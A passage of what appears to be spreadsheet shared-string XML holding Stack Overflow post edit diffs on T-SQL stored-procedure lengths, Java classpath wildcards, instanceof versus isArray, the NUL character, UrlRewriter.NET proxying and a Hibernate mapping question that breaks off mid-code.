  </si>
  <si>
    <t>Mat</t>
  </si>
  <si>
    <t>Perimosh</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A slightly better way than counting the characters, is to use information schema.routines. You could sum the length of each Routine Definition as (Note each routine definition will max out at 4,000 characters, see below for a method that doesn't have this restriction):&lt;/p&gt; _x000D_
 &lt;pre&gt;select Sum(Len(Routine_Definition)) from information_schema.routines _x000D_
where routine_type = 'PROCEDURE'_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Or you could return the length of each sp&lt;/p&gt; _x000D_
 &lt;pre&gt;select Len(Routine_Definition), * from information_schema.routines _x000D_
where routine_type = 'PROCEDURE'_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; It's unlikely that the length of your stored procedures is the problem. Usually running out of space with a database is due to things like not backing up the log file (and then shrinking it using dbcc shrinkfile or dbcc shrinkdatabase).&lt;/p&gt; _x000D_
 &lt;p&gt; In Sql 2000, here is a routine that would provide the length without the 4000 character limit of above:&lt;/p&gt; _x000D_
 &lt;pre&gt;DECLARE @Name &lt;span class="diff-delete"&gt;VARCHAR&lt;/span&gt;(250)_x000D_
DECLARE RoutineCursor CURSOR&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;FOR_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   &lt;span class="diff-delete"&gt;SELECT &lt;/span&gt; Routine_Name&lt;span class="diff-delete"&gt;_x000D_
   &lt;/span&gt; &lt;span class="diff-delete"&gt;FROM   &lt;/span&gt; information_schema.routines&lt;span class="diff-delete"&gt;_x000D_
   &lt;/span&gt; &lt;span class="diff-delete"&gt;WHERE  &lt;/span&gt; routine_type = 'PROCEDURE'_x000D_
_x000D_
DECLARE @Results TABLE_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   (&lt;span class="diff-delete"&gt;_x000D_
 &lt;/span&gt;     &lt;span class="diff-delete"&gt;SpName&lt;/span&gt; &lt;span class="diff-delete"&gt;VARCHAR&lt;/span&gt;(250)&lt;span class="diff-delete"&gt; &lt;/span&gt;,_x000D_
      SpLength &lt;span class="diff-delete"&gt;INT_x000D_
&lt;/span&gt;    )_x000D_
_x000D_
CREATE TABLE ##SpText ( SpText &lt;span class="diff-delete"&gt;VARCHAR&lt;/span&gt;(8000) )_x000D_
_x000D_
OPEN RoutineCursor_x000D_
FETCH NEXT FROM RoutineCursor INTO @Name_x000D_
_x000D_
WHILE @@FETCH_STATUS = 0&lt;span class="diff-delete"&gt; &lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   BEGIN_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;      INSERT&lt;span class="diff-delete"&gt; &lt;/span&gt; INTO ##SpText&lt;span class="diff-delete"&gt;_x000D_
             &lt;/span&gt;   (&lt;span class="diff-delete"&gt; &lt;/span&gt;SpText&lt;span class="diff-delete"&gt; &lt;/span&gt;)&lt;span class="diff-delete"&gt;_x000D_
             &lt;/span&gt;   EXEC sp_helptext @Name_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;      INSERT&lt;span class="diff-delete"&gt; &lt;/span&gt; INTO @Results&lt;span class="diff-delete"&gt;_x000D_
               &lt;/span&gt; (&lt;span class="diff-delete"&gt; &lt;/span&gt;SpName&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
                 &lt;/span&gt; SpLength&lt;span class="diff-delete"&gt;_x000D_
                &lt;/span&gt;)&lt;span class="diff-delete"&gt;_x000D_
               &lt;/span&gt; (&lt;span class="diff-delete"&gt; &lt;/span&gt;SELECT&lt;span class="diff-delete"&gt;   &lt;/span&gt; @Name&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
                           &lt;/span&gt; &lt;span class="diff-delete"&gt;SUM&lt;/span&gt;(&lt;span class="diff-delete"&gt;LEN&lt;/span&gt;(SpText))&lt;span class="diff-delete"&gt;_x000D_
                 &lt;/span&gt; FROM&lt;span class="diff-delete"&gt;     &lt;/span&gt; ##SpText&lt;span class="diff-delete"&gt;_x000D_
                &lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;      TRUNCATE TABLE ##SpText_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;      FETCH NEXT FROM RoutineCursor INTO @Name_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   END_x000D_
_x000D_
CLOSE RoutineCursor_x000D_
DEALLOCATE RoutineCursor_x000D_
DROP TABLE ##SpText_x000D_
_x000D_
SELECT&lt;span class="diff-delete"&gt; &lt;/span&gt; SpName&lt;span class="diff-delete"&gt; &lt;/span&gt;,&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; SpLength&lt;span class="diff-delete"&gt;_x000D_
FROM  &lt;/span&gt;  @Results&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;ORDER BY SpLength DESC_x000D_
SELECT&lt;span class="diff-delete"&gt; &lt;/span&gt; &lt;span class="diff-delete"&gt;SUM&lt;/span&gt;(SpLength)&lt;span class="diff-delete"&gt;_x000D_
FROM  &lt;/span&gt;  @Results_x000D_
_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A slightly better way than counting the characters, is to use information schema.routines. You could sum the length of each Routine Definition as (Note each routine definition will max out at 4,000 characters, see below for a method that doesn't have this restriction):&lt;/p&gt; _x000D_
 &lt;pre&gt;select Sum(Len(Routine_Definition)) from information_schema.routines _x000D_
where routine_type = 'PROCEDURE'_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Or you could return the length of each sp&lt;/p&gt; _x000D_
 &lt;pre&gt;select Len(Routine_Definition), * from information_schema.routines _x000D_
where routine_type = 'PROCEDURE'_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; It's unlikely that the length of your stored procedures is the problem. Usually running out of space with a database is due to things like not backing up the log file (and then shrinking it using dbcc shrinkfile or dbcc shrinkdatabase).&lt;/p&gt; _x000D_
 &lt;p&gt; In Sql 2000, here is a routine that would provide the length without the 4000 character limit of above:&lt;/p&gt; _x000D_
 &lt;pre&gt;DECLARE @Name &lt;span class="diff-add"&gt;VarChar&lt;/span&gt;(250)_x000D_
DECLARE RoutineCursor CURSOR&lt;span class="diff-add"&gt; &lt;/span&gt;FOR_x000D_
   &lt;span class="diff-add"&gt;select&lt;/span&gt; Routine_Name &lt;span class="diff-add"&gt;from&lt;/span&gt; information_schema.routines &lt;span class="diff-add"&gt;where&lt;/span&gt; routine_type = 'PROCEDURE'_x000D_
_x000D_
DECLARE @Results TABLE_x000D_
   (   &lt;span class="diff-add"&gt;SpName&lt;/span&gt;   &lt;span class="diff-add"&gt;VarChar&lt;/span&gt;(250),_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;      SpLength   &lt;span class="diff-add"&gt;Int_x000D_
 &lt;/span&gt;  )_x000D_
_x000D_
CREATE TABLE ##SpText&lt;span class="diff-add"&gt;_x000D_
  &lt;/span&gt; (&lt;span class="diff-add"&gt;  &lt;/span&gt; SpText &lt;span class="diff-add"&gt;  VarChar&lt;/span&gt;(8000)&lt;span class="diff-add"&gt;  &lt;/span&gt; )_x000D_
_x000D_
OPEN RoutineCursor_x000D_
FETCH NEXT FROM RoutineCursor INTO @Name_x000D_
_x000D_
WHILE @@FETCH_STATUS = 0_x000D_
   BEGIN_x000D_
      INSERT INTO ##SpText   (SpText)   EXEC sp_helptext @Name_x000D_
_x000D_
      INSERT INTO @Results (SpName, SpLength) (SELECT @Name, &lt;span class="diff-add"&gt;Sum&lt;/span&gt;(&lt;span class="diff-add"&gt;Len&lt;/span&gt;(SpText)) FROM ##SpText)_x000D_
      TRUNCATE TABLE ##SpText_x000D_
_x000D_
      FETCH NEXT FROM RoutineCursor INTO @Name_x000D_
   END_x000D_
_x000D_
CLOSE RoutineCursor_x000D_
DEALLOCATE RoutineCursor_x000D_
DROP TABLE ##SpText_x000D_
_x000D_
SELECT SpName, SpLength &lt;span class="diff-add"&gt;FROM&lt;/span&gt; @Results&lt;span class="diff-add"&gt; &lt;/span&gt;ORDER BY SpLength DESC_x000D_
SELECT &lt;span class="diff-add"&gt;Sum&lt;/span&gt;(SpLength) &lt;span class="diff-add"&gt;FROM&lt;/span&gt; @Results_x000D_
_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you're using Java 6 (which you should be), Sun added classpath wildcards but you have to get the syntax JUST right. See &lt;a href="http://java.sun.com/javase/6/docs/technotes/tools/windows/classpath.html" rel="nofollow noreferrer"&gt;Classpath&lt;/a&gt;. Jump down to the section, "Understanding class path wildcards" (about midway down the page)&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Class path entries can contain the basename wildcard character *, which is_x000D_
considered equivalent to specifying a list of all the files in the directory_x000D_
with the extension .jar or .JAR. For example, the &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;path&lt;/span&gt; &lt;span class="hljs-title"&gt;entry&lt;/span&gt; &lt;span class="hljs-title"&gt;foo&lt;/span&gt;/*_x000D_
&lt;span class="hljs-title"&gt;specifies&lt;/span&gt; &lt;span class="hljs-title"&gt;all&lt;/span&gt; &lt;span class="hljs-title"&gt;JAR&lt;/span&gt; &lt;span class="hljs-title"&gt;files&lt;/span&gt; &lt;span class="hljs-title"&gt;in&lt;/span&gt; &lt;span class="hljs-title"&gt;the&lt;/span&gt; &lt;span class="hljs-title"&gt;directory&lt;/span&gt; &lt;span class="hljs-title"&gt;named&lt;/span&gt; &lt;span class="hljs-title"&gt;foo&lt;/span&gt;. &lt;span class="hljs-title"&gt;A&lt;/span&gt; &lt;span class="hljs-title"&gt;classpath&lt;/span&gt; &lt;span class="hljs-title"&gt;entry&lt;/span&gt;_x000D_
&lt;span class="hljs-title"&gt;consisting&lt;/span&gt; &lt;span class="hljs-title"&gt;simply&lt;/span&gt; &lt;span class="hljs-title"&gt;of&lt;/span&gt; * &lt;span class="hljs-title"&gt;expands&lt;/span&gt; &lt;span class="hljs-title"&gt;to&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt; &lt;span class="hljs-title"&gt;list&lt;/span&gt; &lt;span class="hljs-title"&gt;of&lt;/span&gt; &lt;span class="hljs-title"&gt;all&lt;/span&gt; &lt;span class="hljs-title"&gt;the&lt;/span&gt; &lt;span class="hljs-title"&gt;jar&lt;/span&gt; &lt;span class="hljs-title"&gt;files&lt;/span&gt; &lt;span class="hljs-title"&gt;in&lt;/span&gt; &lt;span class="hljs-title"&gt;the&lt;/span&gt; &lt;span class="hljs-title"&gt;current&lt;/span&gt;_x000D_
&lt;span class="hljs-title"&gt;directory&lt;/span&gt;._x000D_
_x000D_
&lt;span class="hljs-title"&gt;A&lt;/span&gt; &lt;span class="hljs-title"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;path&lt;/span&gt; &lt;span class="hljs-title"&gt;entry&lt;/span&gt; &lt;span class="hljs-title"&gt;that&lt;/span&gt; &lt;span class="hljs-title"&gt;contains&lt;/span&gt; * &lt;span class="hljs-title"&gt;will&lt;/span&gt; &lt;span class="hljs-title"&gt;not&lt;/span&gt; &lt;span class="hljs-title"&gt;match&lt;/span&gt; &lt;span class="hljs-title"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;files&lt;/span&gt;. &lt;span class="hljs-title"&gt;To&lt;/span&gt;_x000D_
&lt;span class="hljs-title"&gt;match&lt;/span&gt; &lt;span class="hljs-title"&gt;both&lt;/span&gt; &lt;span class="hljs-title"&gt;classes&lt;/span&gt; &lt;span class="hljs-title"&gt;and&lt;/span&gt; &lt;span class="hljs-title"&gt;JAR&lt;/span&gt; &lt;span class="hljs-title"&gt;files&lt;/span&gt; &lt;span class="hljs-title"&gt;in&lt;/span&gt; &lt;span class="hljs-title"&gt;a&lt;/span&gt; &lt;span class="hljs-title"&gt;single&lt;/span&gt; &lt;span class="hljs-title"&gt;directory&lt;/span&gt; &lt;span class="hljs-title"&gt;foo&lt;/span&gt;, &lt;span class="hljs-title"&gt;use&lt;/span&gt; &lt;span class="hljs-title"&gt;either&lt;/span&gt;_x000D_
&lt;span class="hljs-title"&gt;foo&lt;/span&gt;&lt;/span&gt;;foo&lt;span class="hljs-comment"&gt;/* or foo/*;foo. The order chosen determines whether the classes and_x000D_
resources in foo are loaded before JAR files in foo, or vice_x000D_
versa._x000D_
_x000D_
Subdirectories are not searched recursively. For example, foo/* looks_x000D_
for JAR files only in foo, not in foo/bar, foo/baz, etc._x000D_
_x000D_
The order in which_x000D_
the JAR files in a directory are enumerated in the expanded class path is not_x000D_
specified and may vary from platform to platform and even from moment to moment_x000D_
on the same machine. A well-constructed application should not depend upon any_x000D_
particular order. If a specific order is required then the JAR files can be_x000D_
enumerated explicitly in the class path._x000D_
_x000D_
Expansion of wildcards is done early,_x000D_
prior to the invocation of a program's main method, rather than late, during_x000D_
the class-loading process itself. Each element of the input class path_x000D_
containing a wildcard is replaced by the (possibly empty) sequence of elements_x000D_
generated by enumerating the JAR files in the named directory. For example, if_x000D_
the directory foo contains a.jar, b.jar, and c.jar, then the class path foo/*_x000D_
is expanded into foo/a.jar;foo/b.jar;foo/c.jar, and that string would be the_x000D_
value of the system property java.class.path._x000D_
_x000D_
The CLASSPATH environment_x000D_
variable is not treated any differently from the -classpath (or -cp)_x000D_
command-line option. That is, wildcards are honored in all these cases._x000D_
However, class path wildcards are not honored in the Class-Path jar-manifest_x000D_
header._x000D_
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you're using Java 6 (which you should be), Sun added classpath wildcards but you have to get the syntax JUST right. See &lt;a href="http://java.sun.com/javase/6/docs/technotes/tools/windows/classpath.html" rel="nofollow noreferrer"&gt;Classpath&lt;/a&gt;. Jump down to the section, "Understanding class path wildcards" (about midway down the page)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>James McMahon</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; reverse indentation. For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    for(int i = 0; i &amp;lt; 10; i++)_x000D_
        {_x000D_
myFunc();_x000D_
        }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    if(something)_x000D_
    &lt;span class="diff-delete"&gt;{_x000D_
    &lt;/span&gt;    {_x000D_
// do A_x000D_
        }_x000D_
    else_x000D_
        {_x000D_
// do B_x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; reverse indentation. For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    for(int i = 0; i &amp;lt; 10; i++)_x000D_
        {_x000D_
myFunc();_x000D_
        }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    if(something)_x000D_
        {_x000D_
// do A_x000D_
        }_x000D_
    else_x000D_
        {_x000D_
// do B_x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Greg</t>
  </si>
  <si>
    <t>Jasper</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;If &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;obj&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;null&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;,&lt;/span&gt; the &lt;code&gt;&lt;span class="diff-delete"&gt;instanceof&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; operator will give&lt;/span&gt; you &lt;code&gt;&lt;span class="diff-delete"&gt;false&lt;/span&gt;&lt;/code&gt; but&lt;span class="diff-delete"&gt; trying to invoke the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;getClass&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; method will throw&lt;/span&gt; a &lt;code&gt;&lt;span class="diff-delete"&gt;NullPointerException&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;In&lt;/span&gt; the &lt;span class="diff-add"&gt;latter case, if obj is null&lt;/span&gt; you &lt;span class="diff-add"&gt;won't get a NullPointerException&lt;/span&gt; but a &lt;span class="diff-add"&gt;false&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In general, use the &lt;code&gt;instanceof&lt;/code&gt; operator to test whether an object is an array.&lt;/p&gt; _x000D_
 &lt;p&gt; At the JVM level, the &lt;code&gt;instanceof&lt;/code&gt; operator translates to a specific &lt;a href="http://java.sun.com/docs/books/jvms/second_edition/html/Instructions2.doc6.html#instanceof" rel="nofollow noreferrer"&gt;"instanceof"&lt;/a&gt; byte code, which is highly optimized in most JVM implementations.&lt;/p&gt; _x000D_
 &lt;p&gt; The reflective approach (&lt;code&gt;getClass().isArray()&lt;/code&gt;) is compiled to two separate &lt;a href="http://java.sun.com/docs/books/jvms/second_edition/html/Instructions2.doc6.html#invokevirtual" rel="nofollow noreferrer"&gt;"invokevirtual"&lt;/a&gt; instructions. The more generic optimizations applied by the JVM to these may not be as fast as the hand-tuned optimizations inherent in the "instanceof" instruction.&lt;/p&gt; _x000D_
 &lt;p&gt; There are two special cases: null references and references to primitive arrays.&lt;/p&gt; _x000D_
 &lt;p&gt; A null reference will cause &lt;code&gt;instanceof&lt;/code&gt; to result &lt;code&gt;false&lt;/code&gt;, while the &lt;code&gt;isArray&lt;/code&gt; throws a &lt;code&gt;NullPointerException&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Applied to a primitive array, the &lt;code&gt;instanceof&lt;/code&gt; results &lt;code&gt;false&lt;/code&gt;, but the &lt;code&gt;isArray&lt;/code&gt; returns &lt;code&gt;true&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In general, use the &lt;code&gt;instanceof&lt;/code&gt; operator to test whether an object is an array.&lt;/p&gt; _x000D_
 &lt;p&gt; At the JVM level, the &lt;code&gt;instanceof&lt;/code&gt; operator translates to a specific &lt;a href="http://java.sun.com/docs/books/jvms/second_edition/html/Instructions2.doc6.html#instanceof" rel="nofollow noreferrer"&gt;"instanceof"&lt;/a&gt; byte code, which is highly optimized in most JVM implementations.&lt;/p&gt; _x000D_
 &lt;p&gt; The reflective approach (&lt;code&gt;getClass().isArray()&lt;/code&gt;) is compiled to two separate &lt;a href="http://java.sun.com/docs/books/jvms/second_edition/html/Instructions2.doc6.html#invokevirtual" rel="nofollow noreferrer"&gt;"invokevirtual"&lt;/a&gt; instructions. The more generic optimizations applied by the JVM to these may not be as fast as the hand-tuned optimizations inherent in the "instanceof" instruction.&lt;/p&gt; _x000D_
 &lt;p&gt; There are two special cases: null references and references to primitive arrays.&lt;/p&gt; _x000D_
 &lt;p&gt; A null reference will cause &lt;code&gt;instanceof&lt;/code&gt; to result &lt;code&gt;false&lt;/code&gt;, while the &lt;code&gt;isArray&lt;/code&gt; throws a &lt;code&gt;NullPointerException&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Applied to a primitive array, the &lt;code&gt;instanceof&lt;/code&gt; results &lt;code&gt;false&lt;/code&gt;, but the &lt;code&gt;isArray&lt;/code&gt; returns &lt;code&gt;true&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sam Harwell</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; From time to time, I run into communications issue with other programmers, when we talk about NULL. Now NULL could be &lt;br&gt; &lt;br&gt; a NULL pointer &lt;br&gt; the &lt;span class="diff-delete"&gt;NULL&lt;/span&gt; character &lt;br&gt; an empty data element in some sort of database.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt; &lt;span class="diff-delete"&gt;NULL&lt;/span&gt; seems to be the most confusing. It is the ASCII character 0x00. &lt;br&gt; I tend to use '\0' in my code to represent it. Some developers in my group &lt;br&gt; tend to prefer to simply use 0, and let the compiler implicitly cast it to a char.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt; What do you prefer to use for &lt;span class="diff-delete"&gt;NULL&lt;/span&gt;? and why?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; From time to time, I run into communications issue with other programmers, when we talk about NULL. Now NULL could be &lt;br&gt; &lt;br&gt; a NULL pointer &lt;br&gt; the &lt;span class="diff-add"&gt;NUL&lt;/span&gt; character &lt;br&gt; an empty data element in some sort of database.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt; &lt;span class="diff-add"&gt;NUL&lt;/span&gt; seems to be the most confusing. It is the ASCII character 0x00. &lt;br&gt; I tend to use '\0' in my code to represent it. Some developers in my group &lt;br&gt; tend to prefer to simply use 0, and let the compiler implicitly cast it to a char.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt; What do you prefer to use for &lt;span class="diff-add"&gt;NUL&lt;/span&gt;? and why?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you are looking for real world implemention in .NET, there is &lt;a href="http://urlrewriter.net/" rel="nofollow noreferrer"&gt;.NET URL Rewriter&lt;/a&gt;, &lt;span class="diff-delete"&gt;an&lt;/span&gt; open-source component for IIS/ASP.NET.&lt;/p&gt; _x000D_
 &lt;p&gt; As the name suggests, it's an URL rewriting component, but it has &lt;strong&gt;also reverse proxying capabilities&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; With a simple line like this in the configuration file&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;RewriteRule ^(.*) http://www.testsiteXY.com$1 [P]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; you could easily distribute sites to internal or external locations.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;UrlRewriter.NET is an open-source, light-weight, highly configurable URL rewriting component for ASP.NET 1.1 and 2.0. UrlRewriter.NET provides similar IIS Rewrite capabilities that the Apache web server provides with mod_rewrite and .htaccess. You donâ€™t need to install an ISAPI Rewrite filter to use the component. Best of all, UrlRewriter.NET is free and licensed with a very permissive MIT-style licence.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you are looking for real world implemention in .NET, there is &lt;a href="http://urlrewriter.net/" rel="nofollow noreferrer"&gt;.NET URL Rewriter&lt;/a&gt;, &lt;span class="diff-add"&gt;a free&lt;/span&gt; open-source component for IIS/ASP.NET.&lt;/p&gt; _x000D_
 &lt;p&gt; As the name suggests, it's an URL rewriting component, but it has &lt;strong&gt;also reverse proxying capabilities&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; With a simple line like this in the configuration file&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;RewriteRule ^(.*) http://www.testsiteXY.com$1 [P]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; you could easily distribute sites to internal or external locations.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;UrlRewriter.NET is an open-source, light-weight, highly configurable URL rewriting component for ASP.NET 1.1 and 2.0. UrlRewriter.NET provides similar IIS Rewrite capabilities that the Apache web server provides with mod_rewrite and .htaccess. You donâ€™t need to install an ISAPI Rewrite filter to use the component. Best of all, UrlRewriter.NET is free and licensed with a very permissive MIT-style licence.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>splattne</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to add a &lt;span class="diff-delete"&gt;POJO&lt;/span&gt; to a collection in another &lt;span class="diff-delete"&gt;POJO, and have&lt;/span&gt; a &lt;span class="diff-delete"&gt;POJOLookupTable&lt;/span&gt; which contains a list of &lt;span class="diff-delete"&gt;Columns&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;LookupTable&lt;/span&gt; &lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;long&lt;/span&gt; id;_x000D_
  &lt;span class="hljs-comment"&gt;// More properties go here...&lt;/span&gt;_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; List&amp;lt;Column&amp;gt; columns;_x000D_
_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;addColumn&lt;/span&gt;&lt;span class="hljs-params"&gt;(Column column)&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.columns.add(column);_x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-comment"&gt;// More methods go here...&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In my hibernate configuration I have:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&amp;lt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;name&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"LookupTable"&lt;/span&gt; table=&lt;span class="hljs-string"&gt;"ARR_LOOKUP_TABLE"&lt;/span&gt;&amp;gt;_x000D_
  &amp;lt;id name=&lt;span class="hljs-string"&gt;"id"&lt;/span&gt; column=&lt;span class="hljs-string"&gt;"ID"&lt;/span&gt;&amp;gt;_x000D_
    &amp;lt;generator &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"native"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/id&amp;gt;_x000D_
  &amp;lt;!-- Some properties here --&amp;gt;_x000D_
  &amp;lt;bag name=&lt;span class="hljs-string"&gt;"columns"&lt;/span&gt; cascade=&lt;span class="hljs-string"&gt;"all,delete-orphan"&lt;/span&gt; access=&lt;span class="hljs-string"&gt;"field"&lt;/span&gt;&amp;gt;_x000D_
    &amp;lt;key column=&lt;span class="hljs-string"&gt;"LOOKUP_TABLE"&lt;/span&gt; not-&lt;span class="hljs-keyword"&gt;null&lt;/span&gt;=&lt;span class="hljs-string"&gt;"true"&lt;/span&gt;/&amp;gt;_x000D_
    &amp;lt;one-to-many &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Column"&lt;/span&gt;/&amp;gt;_x000D_
  &amp;lt;/bag&amp;gt;_x000D_
&amp;lt;/&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt;&amp;gt;_x000D_
_x000D_
&amp;lt;&lt;span class="hljs-title"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;name&lt;/span&gt;&lt;/span&gt;=&lt;span class="hljs-string"&gt;"Column"&lt;/span&gt; table=&lt;span class="hljs-string"&gt;"ARR_LOOKUP_COLUMN"&lt;/span&gt;&amp;gt;_x000D_
  &amp;lt;id name=&lt;span class="hljs-string"&gt;"id"&lt;/span&gt; column=&lt;span class="hljs-string"&gt;"ID"&lt;/span&gt;&amp;gt;_x000D_
